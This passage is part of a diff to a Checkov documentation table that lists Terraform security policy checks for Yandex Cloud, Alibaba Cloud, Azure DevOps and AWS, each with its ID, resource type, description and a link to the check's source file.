[ObjectStorageBucketEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketEncryption.py) | -| 2076 | CKV_YC_4 | resource | yandex_compute_instance | Ensure compute instance does not have serial console enabled. 
| Terraform | [ComputeVMSerialConsole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSerialConsole.py) | -| 2077 | CKV_YC_5 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster does not have public IP address. | Terraform | [K8SPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SPublicIP.py) | -| 2078 | CKV_YC_6 | resource | yandex_kubernetes_node_group | Ensure Kubernetes cluster node group does not have public IP addresses. | Terraform | [K8SNodeGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupPublicIP.py) | -| 2079 | CKV_YC_7 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster auto-upgrade is enabled. | Terraform | [K8SAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SAutoUpgrade.py) | -| 2080 | CKV_YC_8 | resource | yandex_kubernetes_node_group | Ensure Kubernetes node group auto-upgrade is enabled. | Terraform | [K8SNodeGroupAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupAutoUpgrade.py) | -| 2081 | CKV_YC_9 | resource | yandex_kms_symmetric_key | Ensure KMS symmetric key is rotated. | Terraform | [KMSSymmetricKeyRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/KMSSymmetricKeyRotation.py) | -| 2082 | CKV_YC_10 | resource | yandex_kubernetes_cluster | Ensure etcd database is encrypted with KMS key. | Terraform | [K8SEtcdKMSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SEtcdKMSEncryption.py) | -| 2083 | CKV_YC_11 | resource | yandex_compute_instance | Ensure security group is assigned to network interface. 
| Terraform | [ComputeVMSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSecurityGroup.py) | -| 2084 | CKV_YC_12 | resource | yandex_mdb_clickhouse_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2085 | CKV_YC_12 | resource | yandex_mdb_elasticsearch_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2086 | CKV_YC_12 | resource | yandex_mdb_greenplum_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2087 | CKV_YC_12 | resource | yandex_mdb_kafka_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2088 | CKV_YC_12 | resource | yandex_mdb_mongodb_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2089 | CKV_YC_12 | resource | yandex_mdb_mysql_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2090 | CKV_YC_12 | resource | yandex_mdb_postgresql_cluster | Ensure public IP is not assigned to database cluster. 
| Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2091 | CKV_YC_12 | resource | yandex_mdb_sqlserver_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2092 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure cloud member does not have elevated access. | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | -| 2093 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_member | Ensure cloud member does not have elevated access. | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | -| 2094 | CKV_YC_14 | resource | yandex_kubernetes_cluster | Ensure security group is assigned to Kubernetes cluster. | Terraform | [K8SSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SSecurityGroup.py) | -| 2095 | CKV_YC_15 | resource | yandex_kubernetes_node_group | Ensure security group is assigned to Kubernetes node group. | Terraform | [K8SNodeGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupSecurityGroup.py) | -| 2096 | CKV_YC_16 | resource | yandex_kubernetes_cluster | Ensure network policy is assigned to Kubernetes cluster. | Terraform | [K8SNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNetworkPolicy.py) | -| 2097 | CKV_YC_17 | resource | yandex_storage_bucket | Ensure storage bucket does not have public access permissions. 
| Terraform | [ObjectStorageBucketPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketPublicAccess.py) | -| 2098 | CKV_YC_18 | resource | yandex_compute_instance_group | Ensure compute instance group does not have public IP. | Terraform | [ComputeInstanceGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupPublicIP.py) | -| 2099 | CKV_YC_19 | resource | yandex_vpc_security_group | Ensure security group does not contain allow-all rules. | Terraform | [VPCSecurityGroupAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupAllowAll.py) | -| 2100 | CKV_YC_20 | resource | yandex_vpc_security_group_rule | Ensure security group rule is not allow-all. | Terraform | [VPCSecurityGroupRuleAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupRuleAllowAll.py) | -| 2101 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_binding | Ensure organization member does not have elevated access. | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | -| 2102 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_member | Ensure organization member does not have elevated access. | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | -| 2103 | CKV_YC_22 | resource | yandex_compute_instance_group | Ensure compute instance group has security group assigned. 
| Terraform | [ComputeInstanceGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupSecurityGroup.py) | -| 2104 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_binding | Ensure folder member does not have elevated access. | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | -| 2105 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_member | Ensure folder member does not have elevated access. | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | -| 2106 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 2107 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 2108 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. 
| Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 2109 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 2110 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 2111 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. 
| Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| | Id | Type | Entity | Policy | IaC | Resource Link | +|------|-----------------|----------|---------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-----------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| 0 | CKV2_ADO_1 | resource | azuredevops_branch_policy_min_reviewers | Ensure at least two approving reviews for PRs | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | +| 1 | CKV2_ADO_1 | resource | azuredevops_git_repository | Ensure at least two approving reviews for PRs | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | +| 2 | CKV_ALI_1 | resource | alicloud_oss_bucket | Alibaba Cloud OSS bucket accessible to public | Terraform | [OSSBucketPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketPublic.py) | +| 3 | CKV_ALI_2 | resource | alicloud_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress22.py) | +| 4 | CKV_ALI_3 | resource | alicloud_security_group_rule | 
Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress3389.py) | +| 5 | CKV_ALI_4 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all regions | Terraform | [ActionTrailLogAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllRegions.py) | +| 6 | CKV_ALI_5 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all events | Terraform | [ActionTrailLogAllEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllEvents.py) | +| 7 | CKV_ALI_6 | resource | alicloud_oss_bucket | Ensure OSS bucket is encrypted with Customer Master Key | Terraform | [OSSBucketEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketEncryptedWithCMK.py) | +| 8 | CKV_ALI_7 | resource | alicloud_disk | Ensure disk is encrypted | Terraform | [DiskIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskIsEncrypted.py) | +| 9 | CKV_ALI_8 | resource | alicloud_disk | Ensure Disk is encrypted with Customer Master Key | Terraform | [DiskEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskEncryptedWithCMK.py) | +| 10 | CKV_ALI_9 | resource | alicloud_db_instance | Ensure database instance is not public | Terraform | [RDSIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSIsPublic.py) | +| 11 | CKV_ALI_10 | resource | alicloud_oss_bucket | Ensure OSS bucket has versioning enabled | Terraform | 
[OSSBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketVersioning.py) | +| 12 | CKV_ALI_11 | resource | alicloud_oss_bucket | Ensure OSS bucket has transfer Acceleration enabled | Terraform | [OSSBucketTransferAcceleration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketTransferAcceleration.py) | +| 13 | CKV_ALI_12 | resource | alicloud_oss_bucket | Ensure the OSS bucket has access logging enabled | Terraform | [OSSBucketAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketAccessLogs.py) | +| 14 | CKV_ALI_13 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires minimum length of 14 or greater | Terraform | [RAMPasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLength.py) | +| 15 | CKV_ALI_14 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one number | Terraform | [RAMPasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyNumber.py) | +| 16 | CKV_ALI_15 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one symbol | Terraform | [RAMPasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicySymbol.py) | +| 17 | CKV_ALI_16 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy expires passwords within 90 days or less | Terraform | [RAMPasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyExpiration.py) | +| 18 | CKV_ALI_17 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires 
at least one lowercase letter | Terraform | [RAMPasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLowercaseLetter.py) | +| 19 | CKV_ALI_18 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy prevents password reuse | Terraform | [RAMPasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyReuse.py) | +| 20 | CKV_ALI_19 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one uppercase letter | Terraform | [RAMPasswordPolicyUppcaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyUppcaseLetter.py) | +| 21 | CKV_ALI_20 | resource | alicloud_db_instance | Ensure RDS instance uses SSL | Terraform | [RDSInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceSSL.py) | +| 22 | CKV_ALI_21 | resource | alicloud_api_gateway_api | Ensure API Gateway API Protocol HTTPS | Terraform | [APIGatewayProtocolHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/APIGatewayProtocolHTTPS.py) | +| 23 | CKV_ALI_22 | resource | alicloud_db_instance | Ensure Transparent Data Encryption is Enabled on instance | Terraform | [RDSTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSTransparentDataEncryptionEnabled.py) | +| 24 | CKV_ALI_23 | resource | alicloud_ram_account_password_policy | Ensure Ram Account Password Policy Max Login Attempts not > 5 | Terraform | [RAMPasswordPolicyMaxLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyMaxLogin.py) | +| 25 | CKV_ALI_24 | resource | alicloud_ram_security_preference | Ensure RAM 
enforces MFA | Terraform | [RAMSecurityEnforceMFA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMSecurityEnforceMFA.py) | +| 26 | CKV_ALI_25 | resource | alicloud_db_instance | Ensure RDS Instance SQL Collector Retention Period should be greater than 180 | Terraform | [RDSRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSRetention.py) | +| 27 | CKV_ALI_26 | resource | alicloud_cs_kubernetes | Ensure Kubernetes installs plugin Terway or Flannel to support standard policies | Terraform | [K8sEnableNetworkPolicies.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sEnableNetworkPolicies.py) | +| 28 | CKV_ALI_27 | resource | alicloud_kms_key | Ensure KMS Key Rotation is enabled | Terraform | [KMSKeyRotationIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyRotationIsEnabled.py) | +| 29 | CKV_ALI_28 | resource | alicloud_kms_key | Ensure KMS Keys are enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyIsEnabled.py) | +| 30 | CKV_ALI_29 | resource | alicloud_alb_acl_entry_attachment | Alibaba ALB ACL does not restrict Access | Terraform | [ALBACLIsUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ALBACLIsUnrestricted.py) | +| 31 | CKV_ALI_30 | resource | alicloud_db_instance | Ensure RDS instance auto upgrades for minor versions | Terraform | [RDSInstanceAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceAutoUpgrade.py) | +| 32 | CKV_ALI_31 | resource | alicloud_cs_kubernetes_node_pool | Ensure K8s nodepools are set to auto repair | Terraform | 
[K8sNodePoolAutoRepair.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sNodePoolAutoRepair.py) | +| 33 | CKV_ALI_32 | resource | alicloud_ecs_launch_template | Ensure launch template data disks are encrypted | Terraform | [LaunchTemplateDisksAreEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LaunchTemplateDisksAreEncrypted.py) | +| 34 | CKV_ALI_33 | resource | alicloud_slb_tls_cipher_policy | Alibaba Cloud Cypher Policy are secure | Terraform | [TLSPoliciesAreSecure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/TLSPoliciesAreSecure.py) | +| 35 | CKV_ALI_35 | resource | alicloud_db_instance | Ensure RDS instance has log_duration enabled | Terraform | [RDSInstanceLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogsEnabled.py) | +| 36 | CKV_ALI_36 | resource | alicloud_db_instance | Ensure RDS instance has log_disconnections enabled | Terraform | [RDSInstanceLogDisconnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogDisconnections.py) | +| 37 | CKV_ALI_37 | resource | alicloud_db_instance | Ensure RDS instance has log_connections enabled | Terraform | [RDSInstanceLogConnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogConnections.py) | +| 38 | CKV_ALI_38 | resource | alicloud_log_audit | Ensure log audit is enabled for RDS | Terraform | [LogAuditRDSEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LogAuditRDSEnabled.py) | +| 39 | CKV_ALI_41 | resource | alicloud_mongodb_instance | Ensure MongoDB is deployed inside a VPC | Terraform | 
[MongoDBInsideVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInsideVPC.py) | +| 40 | CKV_ALI_42 | resource | alicloud_mongodb_instance | Ensure Mongodb instance uses SSL | Terraform | [MongoDBInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInstanceSSL.py) | +| 41 | CKV_ALI_43 | resource | alicloud_mongodb_instance | Ensure MongoDB instance is not public | Terraform | [MongoDBIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBIsPublic.py) | +| 42 | CKV_ALI_44 | resource | alicloud_mongodb_instance | Ensure MongoDB has Transparent Data Encryption Enabled | Terraform | [MongoDBTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBTransparentDataEncryptionEnabled.py) | +| 43 | CKV_AWS_1 | data | aws_iam_policy_document | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/AdminPolicyDocument.py) | +| 44 | CKV_AWS_2 | resource | aws_alb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) | +| 45 | CKV_AWS_2 | resource | aws_lb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) | +| 46 | CKV_AWS_3 | resource | aws_ebs_volume | Ensure all data stored in the EBS is securely encrypted | Terraform | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSEncryption.py) | +| 47 | CKV_AWS_5 | resource | aws_elasticsearch_domain | Ensure all 
data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) | +| 48 | CKV_AWS_5 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) | +| 49 | CKV_AWS_6 | resource | aws_elasticsearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | +| 50 | CKV_AWS_6 | resource | aws_opensearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | +| 51 | CKV_AWS_7 | resource | aws_kms_key | Ensure rotation for customer created CMKs is enabled | Terraform | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSRotation.py) | +| 52 | CKV_AWS_8 | resource | aws_instance | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | +| 53 | CKV_AWS_8 | resource | aws_launch_configuration | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | 
[LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | +| 54 | CKV_AWS_9 | resource | aws_iam_account_password_policy | Ensure IAM password policy expires passwords within 90 days or less | Terraform | [PasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyExpiration.py) | +| 55 | CKV_AWS_10 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires minimum length of 14 or greater | Terraform | [PasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLength.py) | +| 56 | CKV_AWS_11 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one lowercase letter | Terraform | [PasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLowercaseLetter.py) | +| 57 | CKV_AWS_12 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one number | Terraform | [PasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyNumber.py) | +| 58 | CKV_AWS_13 | resource | aws_iam_account_password_policy | Ensure IAM password policy prevents password reuse | Terraform | [PasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyReuse.py) | +| 59 | CKV_AWS_14 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one symbol | Terraform | [PasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicySymbol.py) | +| 60 | CKV_AWS_15 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one 
uppercase letter | Terraform | [PasswordPolicyUppercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyUppercaseLetter.py) | +| 61 | CKV_AWS_16 | resource | aws_db_instance | Ensure all data stored in the RDS is securely encrypted at rest | Terraform | [RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEncryption.py) | +| 62 | CKV_AWS_17 | resource | aws_db_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) | +| 63 | CKV_AWS_17 | resource | aws_rds_cluster_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) | +| 64 | CKV_AWS_18 | resource | aws_s3_bucket | Ensure the S3 bucket has access logging enabled | Terraform | [S3BucketLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLogging.yaml) | +| 65 | CKV_AWS_19 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) | +| 66 | CKV_AWS_19 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) | +| 67 | CKV_AWS_20 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public READ access. 
| Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) | +| 68 | CKV_AWS_20 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public READ access. | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) | +| 69 | CKV_AWS_21 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) | +| 70 | CKV_AWS_21 | resource | aws_s3_bucket_versioning | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) | +| 71 | CKV_AWS_22 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker Notebook is encrypted at rest using KMS CMK | Terraform | [SagemakerNotebookEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookEncryption.py) | +| 72 | CKV_AWS_23 | resource | aws_db_security_group | Ensure every security group and rule has a description | Terraform | 